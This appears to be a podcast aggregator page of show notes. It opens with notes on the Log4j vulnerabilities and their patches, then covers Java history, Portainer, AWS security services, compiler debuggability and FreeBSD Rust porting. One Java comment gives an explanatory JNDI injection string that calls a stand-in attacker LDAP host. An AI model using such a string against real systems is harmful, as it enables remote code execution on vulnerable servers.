- Details from Lunasec: log4j zero day, initial mitigations

CVE–2021–45046
- Fixed in 2.16.0 (which changes functionality) on December 13
- Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations
- When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example $${ctx:loginId}), attackers with control over Thread Context Map (MDC / Mapped Diagnostic Context) input data can craft malicious input data using a JNDI Lookup pattern
- So a JNDI string can be injected again, but the attacker has to know how user data can be pushed into a Thread Context Map referenced by the configuration, or else have access to the configuration, and then it's game over
- Initially this was described as a denial of service via an infinite reference; it was probably a code path that was not protected against message interpolation, and therefore against JNDI access

CVE–2021–45105
- Fixed in 2.17.0 on December 18
- Uncontrolled recursion in a self-referential lookup
- When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId})
- Requires the attacker to control the Thread Context Map (which can be data injected by a framework from user input) or to change the local log4j configuration

CVE–2021–44832
- Fixed in 2.17.1 on December 27
- Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration
- A malicious configuration using a JDBC Appender with a data source referencing a JNDI URI can execute remote code
- The attacker has to access and modify the configuration, which is not simple, unless the platform allows reconfiguration by a user???

Google's package analysis shows 8% of packages on Maven Central affected by log4j 2, with transitive dependency chains going as deep as 9 levels, meaning nine vendors in a row have to fix their dependencies. Still more than 40% of Maven Central downloads are of the impacted versions.

Log4j 1 is not off the hook either:
- JMSAppender: JMS means JNDI, and off we go again
- JDBCAppender: SQL injection FTW
- log4j 1 is no longer maintained. Ah, crap!
- Apache Kafka
- Reload4j from Ceki, a 1.2.17-compatible replacement; see the fixes
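To make the CVE–2021–44228 injection path above concrete, here is a minimal, illustrative Java sketch of the vulnerable pattern; the class, method, and attacker domain are invented for the example, and it applies to Log4j 2 versions before 2.15.0.

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginController {
    private static final Logger log = LogManager.getLogger(LoginController.class);

    // Any attacker-controlled value that ends up in a log message is a
    // potential injection point on vulnerable Log4j 2 versions.
    void onLoginFailure(String username) {
        // If username is "${jndi:ldap://attacker.example/a}", vulnerable versions
        // interpolate the lookup, contact the attacker's LDAP server, and can end
        // up deserializing and executing code the attacker controls.
        log.error("Login failed for user {}", username);
    }
}

On a patched version (2.17.1 or later, as the notes above recommend), the same call logs the string literally instead of resolving the lookup.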
Any exploitation in the wild? Few, in the end, because every use of log4j is unique: the inputs, what gets logged, and so on. So it's too hard for script kiddies, but it shows up in Metasploit and other attack toolkits: VMware vSphere and Horizon, Ubiquiti, SolarWinds, etc.

What process to follow:
- Verify the veracity of the CVE and understand its attack vectors
- Identify your dependencies, and therefore which of your software is impacted
- Identify the user-supplied data that gets logged
- Define the risk per software and per service
- Apply the security patch and rebuild the package
- Deploy, or ship to your customers
- Repeat in the weeks to come
- Shading? :)

Impact on the industry going forward:
- China rapped Alibaba on the knuckles for not giving this flaw to the Chinese government first
- The Gift of It's Your Problem Now: a discussion of payment and open source. For an individual, open source is a gift, and giving money doesn't improve the gift; injecting financial compensation into a gift breaks the gift and doesn't change the motivation (or breaks it). For a company, open source is a way to get feedback and marketing, so it's a transaction, not a gift.
- Another similar article on the burden of the open source maintainer
- colors and faker: the maintainer added an infinite loop to a very widely used npm package in protest at the lack of (financial) contribution, 20 million downloads per week; GitHub blocked his account and npm restored an older version; a little while earlier, his faker.js-as-a-service idea had been copied
- Reflections on log4shell from the Diabolical Developer: it's a marathon, not a sprint; you burn out after 5 or 6 days flat out, so rotate people. What to watch on the network: adding encryption, auth/auth, "I sanitize data that goes over the wire, I sanitize input that could execute, DOS protection – backoff strategies and more." Supply chain hardening and component governance. OSS funding (hum?)

Contact us
Support Les Cast Codeurs on Patreon https://www.patreon.com/LesCastCodeurs
Do a crowdcast or ask a crowdquestion
Contact us via Twitter https://twitter.com/lescastcodeurs, on the Google group https://groups.google.com/group/lescastcodeurs, or on the website https://lescastcodeurs.com/

The News show
Your Fired, Go Workout

The News show

Play Episode Listen Later Feb 11, 2022 4:59


The LDAP bug has been fixed in the latest Windows 11 update. A PS5 system update will add voice commands. Get free Peloton memberships when you're fired!

Cloud Security Reinvented
Why We Should Embrace Automation to Improve Security with Jonathan Jaffe

Cloud Security Reinvented

Play Episode Listen Later Jan 3, 2022 11:29


Cloud computing is changing the world as we know it. So what impact does it have on the world of security? Jonathan Jaffe is the Chief Information Security Officer at Lemonade, a full-service consumer insurance company powered by artificial intelligence and behavioral economics and driven by social good. After years of experience in information security and cybersecurity, he made the transition to the cloud through a San Francisco startup in 2018, and then in 2020 landed at Lemonade, where it's all cloud and technology. In this episode of the Cloud Security Reinvented podcast, host Andy Ellis and Jonathan Jaffe discuss how the world has changed since the rise of technology and the prevalence of the cloud. They also talk about growth opportunities in the security industry and the power of automation. Tune in to find out more about the post-cloud security era.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

COVID-19 Themed Multistage Malware https://isc.sans.edu/forums/diary/COVID19+Themed+Multistage+Malware/25922/
Cisco SD-WAN Patches https://tools.cisco.com/security/center/publicationListing.x
0patch Selling Patches for Windows 7 https://twitter.com/0patch/status/1240602635205586945
LDAPFragger: Bypassing network restrictions using LDAP attributes https://research.nccgroup.com/2020/03/19/ldapfragger-bypassing-network-restrictions-using-ldap-attributes/

The History of Computing
Java: The Programming Language, Not The Island

The History of Computing

Play Episode Listen Later Sep 25, 2019 21:17


Welcome to the History of Computing Podcast, where we explore the history of information technology. Because understanding the past prepares us for the innovations of the future! Today we're going to look at Java. Java is an Indonesian island with over 141 million people. Java man lived there 1.7 million years ago. Wait, wrong java. The infiltration of coffee into the modern world can really trace its roots to ancient coffee forests on the Ethiopian plateau. Sufis in Yemen began importing coffee in the 1400s to make a beverage that would aid in concentration and act as a kind of spiritual intoxication. Um, still the wrong java… Although caffeine certainly has a link somewhere, somehow. The history of the Java programming language dates back to early 1991. It all started at Sun Microsystems with the Stealth Project. Patrick Naughton had considered going to NeXT due to limitations in C++ and the C APIs. But he stayed to join Stealth, a secret team of engineers led by a developer Sun picked up from Carnegie Mellon named James Gosling. Stealth was formed to explore new opportunities in the consumer electronics market. This came up when Gosling was writing a program to port software from the PERQ to the VAX, emulating hardware as many, many, many programmers had done before him. I wonder if he realized, when he went to build the first Java compiler and the original virtual machine code, that he would go on to write a dozen books about Java and that it would consume most of his professional life. I wonder how much coffee he would have consumed if he had. They soon added Mike Sheridan to the team. The project was later known as the “Green” project and, with the advent of the web, somewhat pivoted into more of a web project. You see, Microsoft and the clones had some runaway success, but Apple and other vendors were a factor in the home market. But Sun saw going down market as the future of the company. They added a few more people and rented separate offices in Menlo Park. Lisa Friendly was the first employee in the Java Products Group. Gosling would be lead engineer. John Gage would direct the project. Jonni Kanerva would write the Java FAQ. The team started to build C++ ++ --. Sun founder Bill Joy wanted a language that combined the best parts of Mesa and C. In 1993, NCSA gave us Mosaic. That Andreessen guy was on the news saying the era of the desktop was over. These brilliant designers knew they needed an embedded application, one that could even be used in a web browser, as an applet. The language was initially called “Oak,” but was later renamed “Java” in 1995, supposedly from a list of random words but really due to massive consumption of coffee imported from the island of Java. By the way, it only aids in concentration up to a point. Then you get jumpy. Like a Halfling. It took the Java team 18 months to develop the first working version. It is unknown how much Java they drank in this time. Between the initial implementation of Oak in the fall of 1992 and the public announcement of Java in the spring of 1995, around 13 people ended up contributing to the design and evolution of the language. They were going to build a language that could sit on top of the operating systems on the market. This would allow them to be platform agnostic. In 1995, the team announced that the evolution of Mosaic, Netscape Navigator, would provide support for Java. Java gave us Write Once, Run Anywhere platform independence. You could run the code on a Mac, on Solaris, or on Windows.
Java derives its syntax from C, and many of its object-oriented features were influenced by C++. Several of Java's defining characteristics come from—or are responses to—its predecessors. Therefore, Java was meant to build on these and become a simple, object-oriented, distributed, interpreted, robust, secure, architecture-neutral, portable, high-performance, multithreaded, and dynamic language. Before I forget: the "Mocha Java" blend pairs coffee from Yemen and Java to get a thick, syrupy, and highly caffeinated blend that is often found with a hint of cinnamon or clove.

As with all other computer languages, innovation in the design of the language was driven by the need to solve a fundamental problem that the preceding languages could not. To start, the creation of C is considered by many to have marked the beginning of the modern age of computer languages. It successfully synthesized the conflicting attributes that had so troubled earlier languages. The result was a powerful, efficient, structured language that was relatively easy to learn. It also included one other, nearly intangible aspect: it was a programmer's language. Prior to the invention of C, computer languages were generally designed either as academic exercises or by bureaucratic committees. C was designed, implemented, and developed by real, working programmers, reflecting how they wanted to write code. Its features were honed, tested, thought about, and rethought by the people who actually used the language. C quickly attracted many followers who had a near-religious zeal for it, and it found wide and rapid acceptance in the programmer community. In short, C is a language designed by and for programmers, as is Java.

Throughout the history of programming, the increasing complexity of programs has driven the need for better ways to manage that complexity, and C++ is a response to that need. To better understand why managing program complexity is fundamental to the creation of C++, consider that in the early days, programming was done by manually toggling in the binary machine instructions via the front panel or by punching cards. As long as programs were just a few hundred instructions long, this worked. But as programs grew, assembly language was invented so that a programmer could deal with larger, increasingly complex programs by using symbolic representations of the machine instructions. As programs continued to grow, high-level languages were introduced that gave the programmer more tools with which to handle complexity. This gave birth to the first popular programming language: FORTRAN. Though impressive, it had its shortcomings, as it didn't encourage clear and easy-to-understand programs. In the 1960s, structured programming was born; this is the method of programming later championed by languages such as C. The use of structured languages enabled programmers to write, for the first time, moderately complex programs fairly easily. However, even with structured programming methods, once a project reaches a certain size, its complexity exceeds what a programmer can manage. With continued growth, projects were exceeding the limits of the structured approach. To overcome this problem, a new way to program had to be invented: object-oriented programming (OOP). Object-oriented programming is a programming methodology that helps organize complex programs through the use of inheritance, encapsulation, and polymorphism.
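Those three pillars are easier to see in code than in prose. Here is a tiny illustration, sketched in Python purely for brevity; Java expresses exactly the same ideas with its class model, and the account example is invented for illustration:

```
# Encapsulation, inheritance, and polymorphism in a few lines.

class Account:
    def __init__(self, owner, balance):
        self.owner = owner
        self._balance = balance          # encapsulation: state kept behind methods

    def deposit(self, amount):
        if amount <= 0:
            raise ValueError("deposit must be positive")
        self._balance += amount

    def monthly_fee(self):
        return 5.0                       # default behaviour

class SavingsAccount(Account):           # inheritance: reuses Account's behaviour
    def monthly_fee(self):
        return 0.0                       # polymorphism: same call, different result

def charge_fees(accounts):
    # Callers don't care which concrete type each object is.
    return sum(acct.monthly_fee() for acct in accounts)

accounts = [Account("ada", 100), SavingsAccount("jim", 250)]
print(charge_fees(accounts))             # prints 5.0
```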
In spite of the fact that C is one of the world's great programming languages, there is still a limit to its ability to handle complexity. Once the size of a program exceeds a certain point, it becomes so complex that it is difficult to grasp as a totality. While the precise size at which this occurs differs, depending upon both the nature of the program and the programmer, there is always a threshold at which a program becomes unmanageable. C++ added features that enabled this threshold to be broken, allowing programmers to comprehend and manage larger programs.

The primary motivation for creating Java, then, was the need for a platform-independent, architecture-neutral language that could be used to create software to be embedded in various consumer electronic devices, such as microwave ovens and remote controls. The developers sought a different approach to building the language, one which did not require a native compiler for every target platform as C and C++ did: a solution that was easier and more cost-efficient. But embedded systems took a backseat when the Web took shape at about the same time that Java was being designed, and Java was suddenly propelled to the forefront of computer language design. This could be in the form of applets for the web or runtime-only packages known as Java Runtime Environments, or JREs. At the time, developers had fractured into three competing camps: Intel, Macintosh, and UNIX, and most software engineers stayed inside their fortified boundary. But with the advent of the Internet and the Web, the portability of software between platforms suddenly became important in ways it hadn't been since the forming of ARPANET. Even though many platforms are attached to the Internet, users would like them all to be able to run the same program. What was once an irritating but low-priority problem had become a high-profile necessity. The team realized this pressing need and made the switch to refocus Java from embedded consumer electronics to Internet programming. So while the desire for an architecture-neutral programming language provided the initial spark, the Internet ultimately led to Java's large-scale success.

So if Java derives much of its character from C and C++, this is by intent. The original designers knew that using familiar syntax would make their new language appealing to legions of experienced C/C++ programmers. Java also shares some of the other attributes that helped make C and C++ successful. Java was designed, tested, and refined by real, working programmers. Not scientists. Java is a programmer's language. Java is also cohesive and logically consistent. If you program well, your programs reflect it. If you program poorly, your programs reflect that, too. Put differently, Java is not a language with training wheels. It is a language for professional programmers.

Java 1 was released in 1996 for Solaris, Windows, Mac, and Linux. It was released as the Java Development Kit, or JDK, and to this day we still refer to versions that way, as in JDK 11. Version 2, or 1.2, came in 1998, and with the rising popularity came a few things the burgeoning community needed: event listeners, Just-In-Time compilation, and changes to thread synchronization. 1.3, code-named Kestrel, came in 2000, bringing RMI compatibility with CORBA, synthetic proxy classes, the Java Platform Debugger Architecture, the Java Naming and Directory Interface in the core libraries, the HotSpot JVM, and Java Sound.
Merlin, or 1.4, came in 2002, bringing the frustrating regular expressions, native XML processing, logging, non-blocking I/O, and SSL. Tiger, or 1.5, came in 2004. This was important. We could autobox, get compile-time type safety with generics, statically import the static members of a class, and use annotations for declarative programming, and the runtime libraries were mapped into memory, a huge improvement to how JVMs work. Java 5 also gave us the version number change, so JDK 1.5 was officially recognized as Java 5. JDK 1.6, or Mustang, came in 2006. This was a big update, bringing monitoring and management tools; compiler access, which gave us programmatic access to javac; and pluggable annotations, which allowed us to analyze code semantically as a step before javac compiles it. WebStart got a makeover and SE 6 unified plugins with WebStart. Enhanced XML services would be important (at least until the advent of JSON), and you could mix JavaScript up with Java. We also got JDBC 4, Character Large Objects, SwingWorker, JTable, better SQL datatypes, native PKI, Kerberos, and LDAP support, and honestly the most important thing was that it was stable. Although I've never written code stable enough to encounter their stability issues… Not enough coffee I suppose.

Sun purchased Oracle in 2009. Wait, no, that's one of my Marvel What If comic book fantasies where the world was a better place. Oracle bought Sun in 2009. After ponying up $5.6 billion, Oracle had a lot of tech based on Sun products, and seeing Sun as an increasingly attractive acquisition target for other companies, Oracle couldn't risk someone else swooping in and buying Sun. With all the turmoil created, it took 5 years, during a pretty formative time on the web, but we finally got Dolphin, or 1.7, which came in 2011 and gave us compressed 64-bit pointers, strings in switch statements, binary integer literals and underscores in literals, better graphics APIs, more cryptography algorithms, and a new I/O library with even better platform compatibility. Spider, or 1.8, came along in 2014. We got the ability to launch JavaFX application JARs, statically-linked JNI libraries, a new date and time API, annotations on Java types, unsigned integer arithmetic, and a JavaScript runtime that allowed us to embed JavaScript code in apps; whether this is a good idea or not is still TBD. Lambda expressions had been dropped from Java 7, so here we finally got them. And this kickstarted a pretty interesting time in the development of Java.

We got 9 in 2017, 10 and 11 in 2018, and 12 and 13 in 2019, with 14 due in 2020. Of these, only 8 and 11 are LTS, or commercial Long Term Support, releases, basically meaning we got the next LTS after 8 in 2018 and, according to my trend line, should expect the next LTS in 2021 or 2022. JDK 13, released in September 2019, gives us text blocks and switch expressions (both in preview), improved memory management by returning unused heap memory to the OS, improved application class-data sharing, and a reimplementation of the legacy socket API. But it won't likely be an LTS release. Today there are over 45 billion active Java Virtual Machines, and Java remains arguably the top language for microservices, CI/CD environments, and a number of other use cases. Other languages have come. Other languages have gone. Many are better in their own right. Some are not. Java is not perfect. It was meant to reduce complexity. But as languages evolve they become more complex.
A project with a million lines of code is monolithic and probably incorporates plugins or frameworks, like Spring Security for example, that make the code even more complex. But Java is meant to reduce cyclomatic complexity, to allow for a language that is simple enough for a professional to pick up quickly and only as complex as the quality of the code being compiled. I don't personally love Java. I respect it. And I adore high-quality programmers and their code in any language. But I've had to redo so much work because other languages have come and gone over the years that if I were starting a new big monolithic web app today, I'd probably use Java every time. Which isn't to say that Java isn't useful in microservice architectures. Depending on what's required from the contract testing on a service, I might use Java, Go, Node, Python, or even the formerly hipster Ruby. Although I don't love drinking PBR… If I'm writing an Android app, I need to know Java. No matter what the lawyers say. If I'm planning an enterprise web app, Java needs to be in the conversation. But usually, I can do the work in a fraction of the time using something like Python. But most big companies speak Java. And for good reason.

Because of the write once, run anywhere approach and the level of permissions a JRE needs, there have been security challenges with running Java on desktop computers. Apple deprecated Java on the Mac in 2010. Users could still install a runtime themselves, but Java's real home shifted to server-side applications, and it is the gold standard for those. I'm certainly not advocating going back to the 90s and running Java apps on our desktops any more. No matter what you think of Java, one thing you have to admit: the introduction of the language and its evolution have had a substantial impact on the IT industry, and it will continue to do so. A great takeaway here might be that there's always a potential alternative that might be better suited for a given task. But when it comes to choosing a platform that will be there in a decade or three, getting support, getting a team that can scale, sometimes you might end up using a solution that doesn't immediately seem as well suited to a need. But it can get the job done. As it's been doing since James Gosling and the rest of the team started the project back in the early 90s. So thank you listeners, for sticking with us through this episode of the History of Computing Podcast. We're lucky to have you.

The Byte - A Byte-sized podcast about Containers, Cloud, and Tech
Portainer - A User Interface for Managing Docker

The Byte - A Byte-sized podcast about Containers, Cloud, and Tech

Play Episode Listen Later May 8, 2019 5:13


Website - https://www.portainer.io/

Episode Transcription: Welcome back to The Byte. In this episode, we are going to talk about Portainer. Portainer is a user interface for Docker Standalone, Docker Compose, or Docker Swarm. It now runs on Windows 1803 and above, or Linux. So essentially you can manage Linux workloads, or Windows containers, which is a new feature. This is extremely helpful. We use it for a couple of our projects. I also use it privately for a few of the Swarms that I am running, and it works incredibly well. It's very stable and has all the features I'm looking for. Let's walk through the different features.

Now, to get up and running, it's one Docker run command, which launches the dashboard, the templates, and the manager. Then, for every node you want to manage in your Swarm, you have to deploy an agent. It's basically a service task that runs, and you register it back into the dashboard, and then you have visibility of what's going on. Now, in the dashboard, you can actually see Stacks, Services, Volumes, Networks. It's essentially everything we're really interested in when we're managing a Swarm cluster.

We also have application templates, and here we have an application. We can say, for example, "Is it a container template? Is it a Swarm stack? Is it a Compose stack?" And we can use existing applications, or we can actually create our own stacks and make them available for our users, which is quite helpful. Think of it as a kickstart for your developers. You can make a Python app, with an Nginx, and all the monitoring, logging, and best practices already baked in. So all your developer has to do is stand it up. Very helpful.

You also have Stacks. Stacks allow us to manage a Swarm stack and take control of it. We can update it, we can add more services, et cetera. It's very helpful. We can create and manage Stacks; it's essential. Let me just go through the interface. You go "Add Stack". It has a web editor. You can actually copy and paste the code right in here, or you can upload YAML, or you can actually grab the YAML file from a Git repository. So, all very helpful ways to deploy a Stack.

We can also manage things like Services, Containers, Images, Networks, and Volumes. It really covers all the things we're really interested in. A couple of things I didn't write down: we can also look at the configurations and the secrets, so we can do secret management. And within the Swarm itself, I can actually see a cluster visualizer. This actually comes from the open-source part of Docker: the Docker example app had the cluster visualizer, and that's been incorporated in-house. So we can see, per node, what's running in each node: containers, et cetera.

Now, what's quite interesting, and quite new, is the user management perspective. Previously, it was all local users, so local users and groups, and now they have local users or LDAP; you can integrate it with your LDAP. And, very new, there is now external authentication via an OAuth integration, which is really cool. So you can actually integrate directly with GitHub, GitLab, Twitter, et cetera. Whatever your providers are.

Now, I find it extremely easy to manage. I use it for my monitoring demos and so on, because I want to see what's going on. I want to see Images, I want to see Networks. And within Networks, for example, I can go in here and I can manage Networks. In Services, I can scale Services up and down.
And I can actually click on a Container and see it; I can stop it, kill it, restart it, or add additional Containers. Then, within the Container configuration, I can add commands, entry points… Everything in the command-line is also here. I can also change the logging driver and restart policies. It has all the features of the command-line, but visually. So for teams that are not quite familiar, or comfortable, with the command-line, it's a great place to start, because it allows you to understand exactly how things are working.

Additionally, it's great for operations teams, because they can see right away, from one user interface, one Swarm or multiple Swarms, how everything's running, and it's quite easy to manage. Like I said, give it a try: Portainer.io. I'm a big user and a fan of this project. Their business model is built on support: they charge by how many endpoints you manage, and an endpoint, like I mentioned before, is actually just an API that's exposed. It's how many APIs are exposed. That's how they're making money at the moment. So have a look. It's open-source. It's really well maintained. They're adding features all the time, and it's a great service. Portainer.io. We'll see you next time. Have a great day.
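For reference, the "one Docker run command" deployment mentioned above looked roughly like the following at the time, here driven from Python via the docker CLI. The image name (portainer/portainer) and port 9000 reflect the Portainer docs of this era and should be treated as assumptions to verify against the current documentation:

```
import subprocess

def deploy_portainer():
    # Assumed deployment of the era: publish the dashboard on 9000 and
    # mount the Docker socket so Portainer can manage the local engine.
    cmd = [
        "docker", "run", "-d",
        "--name", "portainer",
        "-p", "9000:9000",
        "-v", "/var/run/docker.sock:/var/run/docker.sock",
        "portainer/portainer",
    ]
    # `docker run -d` prints the new container ID on stdout.
    container_id = subprocess.run(
        cmd, check=True, capture_output=True, text=True
    ).stdout.strip()
    print(f"Portainer running as container {container_id}")

if __name__ == "__main__":
    deploy_portainer()
```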

Develpreneur: Become a Better Developer and Entrepreneur
AWS Compliance, Identity and Security Services (Part 2)

Develpreneur: Become a Better Developer and Entrepreneur

Play Episode Listen Later Nov 5, 2018 24:36


This second part of AWS compliance, identity, and security-related services should feel familiar.  These are solutions that nearly everyone needs, and has used, at some point.  Fortunately, these have free tiers and tutorials to help any user get started with them and build them into your environment in the cloud.

Cloud Directory
This is an all-important LDAP-related service.  The power that the Amazon service brings to this universal need is the ability to integrate and work across multiple directories instead of a single one at a time.  There is a free tier along with some excellent examples to help you get started.

Guard Duty
This is an attack analytics tool that does not require an installation on your servers.  That alone should be enough to pique your interest if you have ever had to use these applications before.  Although powerful, these applications tend to be a bit of a chore to install and configure.  GuardDuty takes that annoying setup out of the equation and removes all excuses for not being proactive with your security.

Certificate Manager
Google has made sure we all care about security certificates.  All web applications that are not secured with a certificate are dinged in search scoring.  Therefore, Amazon provides us with a tool for managing those certificates.

Firewall Manager
All of the services and servers we are building in Amazon's cloud need to be secured by a firewall.  This alone can mean some administrative headaches.  However, Amazon is nice enough to provide us with this service to make that a non-issue.  The Firewall Manager tool is easy to use and applies throughout your system.  Thus, you have one central location to manage all of those security decisions.

Secrets Manager, HSM, and Key Management Service
These services are not much more than the names imply.  They allow you to manage your keys and secrets (authentication credentials) in a single location and link them to the resources that need them.  This is highly important when you consider the dynamic nature of the resources we use in the cloud and the challenge of tracking authentication across them.

Cognito
You have likely used sites where authentication is done through Google or Facebook.  This service provides you with a way to easily allow users to register in your directory and manage them.  Note, this is an application-level registration and authentication service, not a way for users to be added to your Amazon organization.

Inspector
When the time comes to get your site audited for security, this service is where you should start.  The Inspector service does an assessment based on best practices and security concerns, then provides you with a report about your application.  Therefore, this service gives you a list of what is correct and what is not compliant.  Use these results to do your best on your upcoming security audit.
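As a concrete taste of the secrets workflow described above, here is a minimal boto3 sketch: store credentials centrally, fetch them at runtime instead of hard-coding them. The secret name, region, and JSON layout are placeholder assumptions:

```
import json

import boto3

def get_db_credentials(secret_id="prod/app/db", region="us-east-1"):
    # Fetch a secret by name; SecretString holds whatever you stored,
    # commonly a small JSON document of credentials.
    client = boto3.client("secretsmanager", region_name=region)
    response = client.get_secret_value(SecretId=secret_id)
    return json.loads(response["SecretString"])

creds = get_db_credentials()
print(creds["username"])  # never committed to source control
```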

BSD Now
223: Compile once, debug twice

BSD Now

Play Episode Listen Later Dec 6, 2017 111:35


Picking a compiler for debuggability, how to port Rust apps to FreeBSD, what the point of Docker is on FreeBSD/Solaris, another EuroBSDcon recap, and network manager control in OpenBSD.

This episode was brought to you by

Headlines

Compile once, Debug twice: Picking a compiler for debuggability, part 1 of 3 (https://backtrace.io/blog/compile-once-debug-twice-picking-a-compiler-for-debuggability-1of3/)

An interesting look into why, when you try to debug a crash, you can often find that all of the useful information has been 'optimized out'. Have you ever had an assert get triggered only to result in a useless core dump with missing variable information or an invalid callstack? Common factors that go into selecting a C or C++ compiler are availability, correctness, compilation speed, and application performance. A factor that is often neglected is debug information quality, which symbolic debuggers use to reconcile application executable state with the source-code form that is familiar to most software engineers. When production builds of an application fail, the level of access to program state directly impacts the ability of a software engineer to investigate and fix a bug. If a compiler has optimized out a variable or is unable to express to a symbolic debugger how to reconstruct the value of a variable, the engineer's investigation process is significantly impacted. Either the engineer has to attempt to recreate the problem, iterate through speculative fixes, or attempt to perform prohibitively expensive debugging, such as reconstructing program state through executable code analysis. Debug information quality is in fact not proportionally related to the quality of the generated executable code and varies wildly from compiler to compiler. Different compilers emit debug information at varying levels of quality and accuracy. However, certain optimizations will certainly impact any debugger's ability to generate accurate stack traces or extract variable values.

In the blog's first example program, the value of argv is extracted and then the program is paused. The ck_pr_load_ptr function performs a read from the region of memory pointed to by argv, in a manner that prevents the compiler from performing optimization on it. This ensures that the memory access occurs, and for this reason the value of argv must be accessible by the time ck_pr_load_ptr is executed. When compiled with gcc, the debugger fails to find the value of the variable: the compiler determines that the value of argv is no longer needed after the ck_pr_load_ptr operation and so doesn't bother paying the cost of saving it.

Some optimizations generate executable code whose call stack cannot be sufficiently disambiguated to reconcile a call stack that mirrors that of the source program. Two common culprits for this are tail call optimization and basic block commoning. In another example, if the program receives a first argument of 1, then function is called with the argument "a". If the program receives a first argument of 2, then function is called with the argument "b". However, if we compile this program with clang, the stack traces in both cases are identical! clang informs the debugger that the function f invoked the function("b") branch where x = 2, even if x = 1. Though some optimizations will certainly impact the accuracy of a symbolic debugger, some compilers simply lack the ability to generate debug information in the presence of certain optimizations. One common optimization is induction variable elimination.
A variable that's incremented or decremented by a constant on every iteration of a loop, or derived from another variable that follows this pattern, is an induction variable. Coupled with other optimizations, the compiler is then able to generate code that doesn't actually rely on a dedicated counter variable "i" for maintaining the current offset into "buffer". In the blog's example, i is completely optimized out: the compiler determines it doesn't have to pay the cost of maintaining the induction variable i and instead maintains the pointer in the register %rdi. The code is effectively rewritten so that the for loop with its counter becomes a while loop whose condition is reaching the end of the input. We have shown some common optimizations that may get in the way of the debuggability of your application and demonstrated a disparity in debug information quality across two popular compilers. In the next blog post of this series, we will examine how gcc and clang stack up with regards to debug information quality across a myriad of synthetic and real-world applications. Looking forward to part 2 ***

This is how you can port your rust application to FreeBSD (https://medium.com/@andoriyu/this-is-how-you-can-port-your-rust-application-to-freebsd-7d3e9f1bc3df)

The FreeBSD Ports Collection is the way almost everyone installs applications ("ports") on FreeBSD. Like everything else about FreeBSD, it is primarily a volunteer effort. It is important to keep this in mind when reading this document. In FreeBSD, anyone may submit a new port, or volunteer to maintain an existing unmaintained port. No special commit privilege is needed. For this guide I will use the fd tool written by David Peter as the example project.

Prerequisites:
- a FreeBSD installation (a VM is fine)
- a local ports tree (done via svn)
- portlint (located at devel/portlint)
- poudriere (located at ports-mgmt/poudriere) [optional]

Getting the ports tree: when you install FreeBSD, opt out of the bundled ports tree, then install svn and check out a fresh one:

pkg install svn
svn checkout https://svn.freebsd.org/ports/head /usr/ports

Poudriere: sometimes you might get asked to show a poudriere build log, sometimes you won't. It's good to have anyway. If you choose to use poudriere, use ZFS. There are plenty of guides on the subject. The FreeBSD Porter's Handbook is the most complete source of information on porting to FreeBSD.

Makefile: the whole porting process, in most cases, is writing one Makefile. I recommend doing something like the one I wrote for fd.

Port metadata: each port must have one primary category; in the case of fd it will be sysutils, therefore it's located in /usr/ports/sysutils/fd.

PORTNAME= fd
CATEGORIES= sysutils

Since this port conflicts with another util named fd, a package suffix is specified as PKGNAMESUFFIX= -find, and the conflict is declared: CONFLICTS_INSTALL= fd-[0-9]*. That means to install it from packages the user will have to type: pkg install fd-find

Licenses: this section is different for every port, but in the case of fd it's pretty straightforward:

LICENSE= MIT APACHE20
LICENSE_COMB= dual

Since fd includes the text of the licenses, you should do this as well:

LICENSE_FILE_MIT= ${WRKSRC}/LICENSE-MIT
LICENSE_FILE_APACHE20= ${WRKSRC}/LICENSE-APACHE

Distfiles: FreeBSD has a requirement that all ports must allow offline building. That means you have to specify which files need to be downloaded.
Luckily, we now have helpers to download sources directly from GitHub:

USE_GITHUB= yes
GH_ACCOUNT= sharkdp

Since PORTNAME is fd, it will try to download sources for sharkdp/fd. By default it's going to download the tag ${DISTVERSIONPREFIX}${DISTVERSION}${DISTVERSIONSUFFIX}. fd uses v as the prefix, therefore we need to specify DISTVERSIONPREFIX= v. It's also possible to specify GH_TAGNAME in case the tag name doesn't match that pattern.

Extra packages: there are very few Rust projects that are standalone and use no crate dependencies. It used to be a PITA to make this work offline, but now cargo is a first-class citizen in ports:

USES= cargo
CARGO_CRATES= aho-corasick-0.6.3 atty-0.2.3 # and so it goes on

Yes, you have to specify each dependency. Luckily, there is a magic awk script that turns Cargo.lock into what you need. Execute make cargo-crates in the port root. This will fail because you're missing checksums for the original source files:

make makesum
make cargo-crates

This will give you what you need. Double-check that the result is correct. There is a way to ignore the checksum error, but I can't remember… Execute make makesum again.

CARGO_OUT: if build.rs relies on that, you have to change it. fd allows you to use SHELL_COMPLETIONS_DIR to specify where completions go, while ripgrep doesn't. In our case we just specify SHELL_COMPLETIONS_DIR:

SHELL_COMPLETIONS_DIR= ${WRKDIR}/shell-completions-dir
CARGO_ENV= SHELL_COMPLETIONS_DIR=${SHELL_COMPLETIONS_DIR}

PLIST: FreeBSD is very strict about the files it's installing and won't allow you to install random files that get lost. You have to specify which files you're installing. In this case, it's just two:

PLIST_FILES= bin/fd man/man1/fd.1.gz

Note that the sources for fd have an uncompressed man file, while here it's listed as compressed. If a port installs a lot of files, specify them in pkg-plist. To actually install them:

post-install:
	@${STRIP_CMD} ${STAGEDIR}${PREFIX}/bin/fd
	${INSTALL_MAN} ${WRKSRC}/doc/fd.1 ${STAGEDIR}${MAN1PREFIX}/man/man1

Shell completions: clap-rs can generate shell completions for you; it's usually handled by the build.rs script. First, we need to define options:

OPTIONS_DEFINE= BASH FISH ZSH # list options
OPTIONS_DEFAULT= BASH FISH ZSH # select them by default
BASH_PLIST_FILES= etc/bash_completion.d/fd.bash-completion
FISH_PLIST_FILES= share/fish/completions/fd.fish
ZSH_PLIST_FILES= share/zsh/site-functions/_fd

To actually install them:

post-install-BASH-on:
	@${MKDIR} ${STAGEDIR}${PREFIX}/etc/bash_completion.d
	${INSTALL_DATA} ${SHELL_COMPLETIONS_DIR}/fd.bash-completion ${STAGEDIR}${PREFIX}/etc/bash_completion.d
post-install-FISH-on:
	@${MKDIR} ${STAGEDIR}${PREFIX}/share/fish/completions
	${INSTALL_DATA} ${SHELL_COMPLETIONS_DIR}/fd.fish ${STAGEDIR}${PREFIX}/share/fish/completions
post-install-ZSH-on:
	@${MKDIR} ${STAGEDIR}${PREFIX}/share/zsh/site-functions
